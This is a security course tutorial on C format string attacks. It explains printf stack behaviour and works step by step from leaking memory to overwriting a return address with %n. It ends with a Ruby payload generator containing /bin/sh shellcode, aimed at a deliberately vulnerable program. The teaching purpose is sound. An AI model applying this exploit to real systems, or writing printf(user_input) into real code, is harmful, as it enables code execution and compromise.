Format String Attacks

Introduction

There is a family of C functions that allows programmers to easily output formatted text. These functions are referred to as format string functions. When used properly, they are not vulnerable at all, but when used incorrectly they expose vulnerabilities that allow for arbitrary code execution.

Building a full scale attack

To build a successful format string attack that allows for arbitrary code execution, it is imperative to understand memory, stack structure, and how the format string functions work. Once these are understood, this tutorial will lead you through the following steps building up to arbitrary code execution:

Reading memory
Reading exact memory location
Altering memory with arbitrary data
Altering exact memory location with arbitrary data
Altering exact memory location with intentional data

Format string usage

The following program is a simple program that uses a format string function:

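#include <stdio.h>

int main() {
    int a = 5, b = 6;
    char format[] = "A is %i and is at 0x%x.\nB is %i and is at 0x%x.\n";
    /* Printing a pointer with %x assumes a 32-bit build, as used in this tutorial. */
    printf(format, a, &a, b, &b);
    return 0;
}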

Stack layout (highest address first):

The integer a
The integer b
The string format
The address of b
The value of b
The address of a
The value of a
The address of format

When the printf function begins execution, the stack looks like the diagram above. The first three rows in the diagram show the local variables in the main function. The two integers take up 4 bytes each on the stack. The string format takes up 52 bytes of stack space.
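The 52-byte figure can be checked with a little arithmetic. The format string holds 48 characters plus a terminating NUL, and the sketch below assumes the compiler rounds that up to a 4-byte boundary (an assumption about the 32-bit build used here; other compilers may pad differently). The helper names round_up and format_stack_bytes are made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Same string as in the example program: 48 characters plus the NUL. */
static const char format[] =
    "A is %i and is at 0x%x.\nB is %i and is at 0x%x.\n";

/* Hypothetical helper: round size up to the next multiple of align. */
size_t round_up(size_t size, size_t align) {
    assert(align > 0);
    return (size + align - 1) / align * align;
}

/* Bytes the array would occupy if padded to a 4-byte boundary (assumed). */
size_t format_stack_bytes(void) {
    return round_up(sizeof format, 4);
}
```

Here sizeof format is 49 and format_stack_bytes() gives 52, which matches the size quoted above.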

When the setup for printf begins, the arguments are pushed onto the stack in reverse order. First the address of b is pushed onto the stack. Then the value of b. The address of a and the value of a are then pushed onto the stack. Last, the address of the format string is pushed onto the stack.

When the printf function begins executing, it is unaware of what arguments have been pushed onto the stack. The only thing it requires is the first argument, the address of a string. It begins reading that string, and when it encounters a conversion such as %i, it takes the next item off the stack. In the above example, the function sees the %i and takes the value of a, which it then prints. When it reaches the %x, it takes the address of a and prints it. This continues until the end of the string is reached.
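To make the behaviour described above concrete, here is a minimal sketch of a formatter that walks its format string and fetches one argument per conversion. It is not the libc implementation: mini_format is a hypothetical name, it understands only %i and %x, and it writes into a caller-supplied buffer instead of stdout.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical mini-formatter (not how libc is written). Handles only
 * %i and %x and builds the result in out, which holds cap bytes.
 * Returns the number of characters stored, not counting the NUL.
 */
int mini_format(char *out, size_t cap, const char *fmt, ...) {
    va_list args;
    size_t used = 0;

    assert(out != NULL && fmt != NULL);
    if (cap == 0) return 0;
    out[0] = '\0';
    va_start(args, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        if (p[0] == '%' && (p[1] == 'i' || p[1] == 'x')) {
            /* The format string alone decides that an argument is fetched. */
            int n;
            if (p[1] == 'i')
                n = snprintf(out + used, cap - used, "%i", va_arg(args, int));
            else
                n = snprintf(out + used, cap - used, "%x",
                             va_arg(args, unsigned int));
            if (n < 0 || (size_t)n >= cap - used) {
                out[used] = '\0';   /* out of room: drop the partial item */
                break;
            }
            used += (size_t)n;
            p++;                    /* skip the conversion character */
        } else {
            out[used++] = *p;       /* ordinary character: copy it */
            out[used] = '\0';
        }
    }
    va_end(args);
    return (int)used;
}
```

Nothing in the loop checks how many arguments the caller actually supplied. If the format contains more conversions than there are arguments, va_arg simply keeps reading, which is the behaviour the rest of this tutorial relies on.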

So what would happen with the same format string and the function call printf(format)? The stack would look the same, but would not have the value of a, the address of a, the value of b, and the address of b. Therefore, when the printf function accessed the first %i, it would retrieve the next four bytes on the stack (part of the string format) and print those as an integer. This might be a bit difficult to grasp, but it is explained a little more in the following section.

Data access

As mentioned previously, format string functions are safe when they are used correctly. The code used previously could not be attacked because there is no way to control the string passed to the printf function (the input string). Format string vulnerabilities arise when the programmer accidentally allows the user to control the input string. The following short program just reads from stdin and writes to stdout, but uses an input string that the user has control over.

#include <stdlib.h>
#include <stdio.h>
#define BUFSIZE 512

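int run(FILE *input) {
  char line[BUFSIZE];
  fgets(line, BUFSIZE, input);
  printf(line);  /* vulnerable: user input is used as the format string */
  return 0;      /* the function is declared int, so return a value */
}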

int main(int argc, char **argv) {
  if (argc != 2) {
    fprintf(stderr, "program requires one argument, a filename");
    exit(1);
  }

  FILE *fd = fopen(argv[1], "r");
  if (!fd) {
    fprintf(stderr, "file must exist");
    exit(1);
  }
  run(fd);
  return 0;
}

This example would be safe if the printf line was: printf("%s", line);
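The safe form can be sketched as a small helper that treats the user's line purely as data. The name copy_line_safely is hypothetical, and the helper formats into a buffer rather than printing so that the result is easy to inspect.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Copy a user-controlled line into out (cap bytes) without ever using it
 * as the format string. Returns the number of characters stored, or -1 if
 * the line does not fit.
 */
int copy_line_safely(char *out, size_t cap, const char *line) {
    assert(out != NULL && line != NULL);
    if (strlen(line) >= cap)
        return -1;                          /* would not fit */
    /* The format is a constant; line is only the argument for %s. */
    return snprintf(out, cap, "%s", line);
}
```

Given the input "hello %x %i %n", the output is the same 14 characters, because the % sequences are never interpreted.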

Quickly compiling and running this program shows that it works as expected for harmless input values:

$ gcc -m32 -g -z execstack --no-stack-protector -o example example.c 
$ echo "hello world" > input && ./example input
hello world

But what if the input is something with format string arguments?

$ echo "hello %x %i %x %i %x" > input && ./example input
hello 200 134520840 80482a9 0 f7fe09e0
$ echo -e "AAAA.%x.%x.%x.%x.%x.%x" > input && ./example input
AAAA.200.804a008.80482a9.0.f7fe09e0.41414141

The first example above prints hello followed by some data. What is this data? It's data on the stack. The second example above sheds a little more light on what the data really is.

Recalling how the printf function works, the output from the second command prints AAAA followed by the 6 hexadecimal formatted integers. This means the function will read 4 bytes of data 6 times and print the result. The first 4 bytes result in 200; the second, third, and fifth in what look like memory addresses; the fourth in 0; and finally the sixth in 41414141.

The interesting value in this output is 41414141. Everything printed is actual data read from the stack, though. The information on the stack includes the buffer line (taking up BUFSIZE bytes) as well as other information like the 4 byte address of the buffer line (which was pushed onto the stack when the printf function was called).

41414141 is actually the beginning of the string stored in line (the string that was read from the file). The character A translates to 0x41 in ASCII, so 4 A's is 41414141. Think about what the output would look like if you typed an extra A at the beginning of the input and an extra %x at the end of the input: echo -e "AAAAA.%x.%x.%x.%x.%x.%x.%x" > input && ./example input

If you think about what should be printed out in the above example, you might wonder why the result wasn't just AAAA.41414141.junk.junk.junk.junk.junk. The reason is that the printf function actually calls some internal libc functions before it begins doing any real work. This alters the stack a little, adding additional arguments. You can imagine that the internal function call looks something like this: _printf(string, format_arg1, format_arg2, 200, addr, addr, 0, addr). It still expects the first format argument to be the last one pushed onto the stack, though, so it prints 200 first since there were no format arguments.
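The step from the text AAAA to the number 41414141 can be reproduced with a short helper that combines four bytes the way a little-endian x86 CPU loads a 32-bit word. The name load_le32 is made up for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Combine four bytes into a 32-bit word, lowest address = lowest byte. */
uint32_t load_le32(const unsigned char *bytes) {
    assert(bytes != NULL);
    return (uint32_t)bytes[0]
         | (uint32_t)bytes[1] << 8
         | (uint32_t)bytes[2] << 16
         | (uint32_t)bytes[3] << 24;
}
```

Applied to the bytes of "AAAA" this gives 0x41414141. Applied to "ABCD" it gives 0x44434241, which shows the byte reversal that becomes important once addresses are placed in the input.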

Specific Data Access

Reading data off of the stack is useful, but it can only get you so far. It would be a lot more interesting to be able to read data from anywhere within the program's memory. It's actually possible and pretty easy to do. This example will walk through printing out the value of the environment variable PATH. This isn't very sensitive information, but the method used can be used to access any memory.

#include <stdlib.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
  if(argc < 2) {
    printf("Usage:\n%s <environment variable name>\n", argv[0]);
    exit(0);
  }
  char *addr = getenv(argv[1]);
  if(addr == NULL) { printf("The environment variable %s doesn't exist.\n", argv[1]); }
  else { printf("%s is located at %p\n", argv[1], addr); }
  return 0;
}

Compiling the program and running it shows the address of the PATH environment variable.

$ gcc -m32 -g -z execstack --no-stack-protector -o getenv getenv.c 
$ ./getenv PATH
PATH is located at 0xffffde51

This memory address can easily be encoded at the beginning of the input string and then used to print the value of the PATH environment variable.

$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0.ffffde51
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0 ... ar/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Stack layout during the printf call (highest address first):

The buffer line
A null value
Some address
The value 200
The address of line

The address is first encoded into the string in reverse byte order. When the command ending in %x is executed, the last value printed is ffffde51, showing that the address comes out in the proper order. Once this works, it's trivial to change the last %x to a %s. Now rather than printing out the address of the PATH variable, it prints the string stored at that location. The PATH is printed as a result, but it's slightly off: the first two characters are missing. Lowering the address by two bytes, to 0xffffde4f, prints the entire PATH environment variable.

The address needs to be two bytes lower because the names of the two programs are different lengths. The program name getenv is one byte shorter than example. A one byte difference in the command name doubles to a two byte difference in the address offset.

It's important to remember at this point what's actually going on. The entire input string is copied onto the stack, into the buffer line. The target address is at the beginning of the string (the lowest address in the buffer). As the printf function encounters the %x values, it moves up the stack until it reaches the buffer line. The first four bytes of line are the address ffffde4f, so printf can either print that value using %x or print the string at that memory location with %s.
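The reverse byte order used in the echo commands above is just the little-endian encoding of the address. A minimal sketch, with store_le32 as a hypothetical helper name:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit address least-significant byte first (x86 byte order). */
void store_le32(uint32_t addr, unsigned char out[4]) {
    assert(out != NULL);
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For 0xffffde51 this produces the bytes 51 de ff ff, the same sequence written as \x51\xde\xff\xff in the input.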

Altering Memory

It seems odd that functions for printing would allow writing something in memory. It's actually fairly easy to write something to memory with a format string function. Here's an example program:

#include <stdio.h>
int main() {
   int written;
   printf("hello world\n%n", &written);
   printf("%i bytes written\n", written);
}

The %n in a format string is actually used to track the number of characters written so far while printing something out. This could be useful when using a format string function to print something like a decimal number and you need to know how long the output was. When attacking, it makes it possible to write to memory and change, for example, the return address of a function.

Altering Memory at an Exact Location

A good memory address to alter is the return address of the printf function. It's possible to use gdb to find the return address of the printf function. It's a bit tricky, though, and you must have two shells open.

Alter example.c to make a call to sleep(10) just before calling run(fd). Recompile. Then in one shell, execute the example program. In another shell you should attach gdb to the already running example program as shown below. You'll have to do this within 10 seconds or change the sleep call to something longer to allow more time.

$ ps ax | grep example
 8398 pts/1    S+     0:00 ./example input
 8400 pts/2    S+     0:00 grep example
$ gdb -q example 8398
Attaching to program: /home/example/format/example, process 8398
Reading symbols from /lib32/libc.so.6...done.
Loaded symbols for /lib32/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2

warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash at ffffe0b4
0xffffe402 in __kernel_vsyscall ()
(gdb) b printf
Breakpoint 1 at 0xf7ed25e4
(gdb) c
Continuing.

Breakpoint 1, 0xf7ed25e4 in printf () from /lib32/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffffd5a0:
 eip = 0xf7ed25e4 in printf; saved eip 0x80484e8
 called by frame at 0xffffd7c0
 Arglist at 0xffffd598, args: 
 Locals at 0xffffd598, Previous frame's sp is 0xffffd5a0
 Saved registers:
  ebx at 0xffffd594, ebp at 0xffffd598, eip at 0xffffd59c
(gdb) q
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: /home/example/format/example, process 8398

The gdb output shows that the return address for the printf function is at 0xffffd59c which can now be used for altering the return address.

The way to alter the address is by using a %n in the format string. The string is crafted in the same way as when reading from an arbitrary memory location. First enter the address to write data to. Then add enough %x's that the format string function will use the address as the next argument. Instead of adding a %s at the end, though, simply put a %n. This will write to the address rather than reading from it.
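The recipe in the previous paragraph (address, a run of %x's, then one final conversion) can be written as a small string builder. This is only a sketch: build_probe is a hypothetical helper, the count of five %x's comes from the earlier experiments with this particular binary, and the separator dots mirror the echo commands used in this tutorial.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: writes addr (little-endian), then `skips` copies of
 * ".%x", then "." and one final conversion ('x', 's' or 'n') into out.
 * Returns the string length, or -1 if out (cap bytes) is too small.
 * An address containing a 0x00 or newline byte would cut the string short
 * when it is read back with fgets; that case is not handled here.
 */
int build_probe(uint32_t addr, int skips, char final, char *out, size_t cap) {
    unsigned char le[4];
    size_t pos = 0;

    assert(out != NULL);
    if (skips < 0) return -1;
    if (cap < 4 + (size_t)skips * 3 + 3 + 1) return -1; /* addr+skips+final+NUL */

    for (int i = 0; i < 4; i++)
        le[i] = (unsigned char)((addr >> (8 * i)) & 0xff);
    memcpy(out, le, 4);
    pos = 4;
    for (int i = 0; i < skips; i++) {
        memcpy(out + pos, ".%x", 3);    /* each %x consumes one stack word */
        pos += 3;
    }
    out[pos++] = '.';
    out[pos++] = '%';
    out[pos++] = final;                 /* 'x' prints, 's' reads, 'n' writes */
    out[pos] = '\0';
    return (int)pos;
}
```

Calling build_probe(0xffffd59c, 5, 'n', buf, sizeof buf) yields the 22-byte string \x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%n.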

A quick test shows that altering this address crashes the program, but altering addresses 4 bytes higher does not crash it. Writing to a specific address works.

$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.ffffd59c
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Segmentation fault
$ echo -e "\xa0\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.

Writing desired values

Writing a desired value is a bit more tricky. The %n trick still has to be used. The problem is that when %n writes a value, it actually writes a 4 byte integer. The goal is to have the return address changed to be somewhere within the input string. That location needs to be determined first.

We will put 200 nops in front of the shellcode so that the address used doesn't have to be exact. We'll estimate that the buffer is 100 bytes above where printf's return address is stored on the stack. That gives an address of 0xffffd59c + 100 = 0xffffd600.

Remember, %n writes to a memory location the number of bytes that the printf function has output so far. In principle the output could be made 0xffffd600 bytes long before the %n, but that's not practical. Instead, the write can be split up: writing the address 0xffffd600 becomes four separate operations that each set one byte.

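Byte offset from target:  +0  +1  +2  +3  +4  +5  +6
Write 1, value 0x100:     00  01  00  00
Write 2, value 0x1d6:         d6  01  00  00
Write 3, value 0x1ff:             ff  01  00  00
Write 4, value 0x2ff:                 ff  02  00  00
Result:                   00  d6  ff  ff  02  00  00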

Remember that each number being written is 4 bytes long and that the bytes are written in reverse order. The first byte we need to write is 0x00. To do this, we can make the output printed so far 256 bytes long (0x100). Then when the %n writes its value, 00 will be written to the first byte, 01 to the second byte, and 00 to the third and fourth bytes. Next we need a %n that writes to the address one byte higher than the last and puts 0xd6 in it, so the output needs to be extended to length 0x1d6. To write 0xff the first time, the output can be extended to length 0x1ff. The second 0xff can be written by extending the output to 0x2ff (or by simply writing the same value again).

The table above shows the writing of 4 numbers. Each number is written one byte higher than the last. The end result is that the value 0xffffd600 is written into the desired memory location. The 3 bytes after it are also overwritten, but when overwriting a return address, that doesn't matter.
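The four overlapping writes can be replayed on a scratch buffer to confirm the end result. This is a simulation only; it touches no real return address, and the names write_le32 and replay_writes are made up for the sketch.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Store value at mem[offset..offset+3], least-significant byte first. */
static void write_le32(unsigned char *mem, size_t offset, uint32_t value) {
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (unsigned char)((value >> (8 * i)) & 0xff);
}

/*
 * Replay the four %n writes from the table into a 7-byte scratch buffer.
 * mem[0..3] stands for the return-address slot, mem[4..6] for the bytes
 * after it that get clobbered. Returns the slot read back as one word.
 */
uint32_t replay_writes(unsigned char mem[7]) {
    static const uint32_t counts[4] = { 0x100, 0x1d6, 0x1ff, 0x2ff };

    assert(mem != NULL);
    memset(mem, 0xaa, 7);               /* arbitrary starting contents */
    for (size_t i = 0; i < 4; i++)
        write_le32(mem, i, counts[i]);  /* each write starts one byte higher */

    return (uint32_t)mem[0] | (uint32_t)mem[1] << 8
         | (uint32_t)mem[2] << 16 | (uint32_t)mem[3] << 24;
}
```

After the call the buffer holds 00 d6 ff ff 02 00 00, so the slot reads back as 0xffffd600 and the three bytes after it hold leftovers from the last write.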

To get this to work with a format string is actually pretty easy. The formula for what the string should contain is the following:

The address to write in reverse hex
Four bytes (anything will do, we use junk)
The address to write +1 in reverse hex
Four bytes (anything will do, we use junk)
The address to write +2 in reverse hex
Four bytes (anything will do, we use junk)
The address to write +3 in reverse hex
Enough %8x's that the next argument printf reads is the 4 bytes just before the start of the input string (one fewer than the number needed to reach the string itself)
Pairs of a padded %x and a %n (for example %196x%n) to write to the addresses

Until now when printing a number we have used %x, which prints the number in hexadecimal notation. It doesn't ensure that the output will be a certain length, though. You can specify that you want the output to be at least 8 characters long by using %8x. We can use this to our advantage to control the length of the output. Using %100x will output 100 bytes, and the value that a later %n writes grows by 100.
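The effect of a field width on the count that %n stores can be checked in isolation. The sketch below assumes a libc that still honours %n with a constant format string (some hardened C libraries disable it), and count_after_width is a hypothetical name. It uses %*x, which takes the width from the argument list, so that one function covers %8x, %100x and so on.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Print the value 1 in hex with the given minimum field width, then let
 * %n report how many characters that produced. Returns -1 on bad input.
 */
int count_after_width(int width) {
    char buf[512];
    int count = -1;

    if (width < 0 || width >= (int)sizeof buf)
        return -1;
    /* "%*x" reads the field width from the argument before the value. */
    snprintf(buf, sizeof buf, "%*x%n", width, 1u, &count);
    return count;
}
```

A width of 8 gives a count of 8, and a width of 100 gives 100, even though the value itself is a single digit.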

With the formula above, the small Ruby script below was written to create the proper input string. The important part to notice is the addr_overwrite variable. Here is what the printf function ends up doing with it.

It prints the first address followed by the word junk, then does the same for the remaining three addresses (the last one has no junk after it). Then it handles the four %8x's, printing exactly 8 characters for each (a 32 bit value in hex is never longer than 8 digits, and shorter values are padded with spaces). At this point, the next argument that printf will read sits 4 bytes before the start of the input string.

The printf function now reaches the first pair of a padded %x and a %n. The width in the %x is chosen so that the output grows to exactly the integer we want to write. printf processes that %x by printing whatever is in memory just before the input string. It then handles the %n, whose argument is the first four bytes of the input string: the address that we want to write to, now receiving a value that we chose. The next padded %x extends the output again, this time consuming the word junk and printing it in hexadecimal notation. Then comes another %n, for which printf uses the second address in the input string.
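The four widths can be worked out by hand, or with a short helper like the one below. It is a sketch under the assumptions of this walkthrough: 60 characters have been printed before the first padded %x (28 bytes of addresses and junk plus four %8x's), each padded %x prints exactly its width, and widths below 8 are avoided because an 8-digit value would overflow them. The name padding_widths is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * target    : 32-bit value to build one byte at a time, low byte first
 * printed   : characters already output before the first padded %x
 * min_width : smallest width considered safe to use (8 in this tutorial)
 * widths    : receives the four field widths, in write order
 */
void padding_widths(uint32_t target, unsigned printed,
                    unsigned min_width, unsigned widths[4]) {
    assert(widths != NULL);
    for (int i = 0; i < 4; i++) {
        unsigned want = (target >> (8 * i)) & 0xff;
        /* Characters still needed so that (printed % 256) == want. */
        unsigned width = (want + 256 - printed % 256) % 256;
        if (width < min_width)
            width += 256;       /* go around once more; low byte is unchanged */
        widths[i] = width;
        printed += width;       /* the running total that %n would store */
    }
}
```

For the target 0xffffd600 with 60 characters already printed and a minimum width of 8, the helper yields 196, 214, 41 and 256, the same widths that appear in the script's addr_overwrite string.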

Using Ruby will make writing this output a little easier. A small test program will also make it easy to check whether the output will work properly.

$ cat output.rb
#!/usr/bin/env ruby

shellcode = ""
shellcode += "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"
shellcode += "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89"
shellcode += "\xd8\x40\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh"

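addr_overwrite = ""
addr_overwrite += "\x9c\xd5\xff\xffjunk"   # target address, then 4 filler bytes
addr_overwrite += "\x9d\xd5\xff\xffjunk"   # target + 1
addr_overwrite += "\x9e\xd5\xff\xffjunk"   # target + 2
addr_overwrite += "\x9f\xd5\xff\xff"       # target + 3 (28 bytes so far)
addr_overwrite += "%8x%8x%8x%8x"           # 4 * 8 = 32 more, 60 bytes printed
addr_overwrite += "%196x%n"                # 60 + 196 = 256 = 0x100
addr_overwrite += "%214x%n"                # 256 + 214 = 470 = 0x1d6
addr_overwrite += "%41x%n"                 # 470 + 41 = 511 = 0x1ff
addr_overwrite += "%256x%n"                # 511 + 256 = 767 = 0x2ff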

puts addr_overwrite + "\x90" * 200 + shellcode
$ chmod +x output.rb
$ cat test.c
#include <stdio.h>
#include <stdlib.h>
#define INSIZE 512

int main(int argc, char **argv) {
  char line[INSIZE];
  fgets(line, INSIZE, stdin);

  int a, b, c, d;
  printf(line, 1, 2, 3, 4, 0, &a, 0, &b, 0, &c, 0, &d);

  printf("a: 0x%x\nb: 0x%x\nc: 0x%x\nd: 0x%x\n", a, b, c, d);
  return 0;
}
$ gcc -m32 -g -z execstack --no-stack-protector -o test test.c
$ ./output.rb | ./test 
????junk????junk????junk????       1       2       3       4                                                                                                                                                                                                   0                                                                                                                                                                                                                     0                                        0                                                                                                                                                                                                                                                               0?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
                                                                                                                                                  ??
                                                                                                                                                     ̀1ۉ?@̀?????/bin/sh
a: 0x100
b: 0x1d6
c: 0x1ff
d: 0x2ff

When working on this part on your own, you'll have to change the values of the last four additions to the addr_overwrite string. When you do this and rerun the command ./output.rb | ./test, you'll see the values for a, b, c and d change. The values here match up with the desired return address 0xffffd600. Once the addresses are correct, it's time to get a shell.

$ ./output.rb > input
$ ./example input 
????junk????junk????junk????     200 804a008 80482a9       0                                                                                                                                                                                            f7fe09e0                                                                                                                                                                                                              6b6e756a                                 6b6e756a                                                                                                                                                                                                                                                        6b6e756a?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
                ??
                   ̀1ۉ?@̀?????/bin/sh
$ ls
example    getenv    input  output.rb.save  sys.c  test.c   written.c
example.c  getenv.c  output.rb  sys     test   written

If you have difficulty getting the shellcode to execute, you should attach gdb to the process using the same sleep trick described above. Break at the printf function, then use nexti to advance until the function is about to complete. Then use info frame to see if the return address was changed to the right value.

Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.

Introduction to System Security

Northwestern CS, Winter Quarter 2023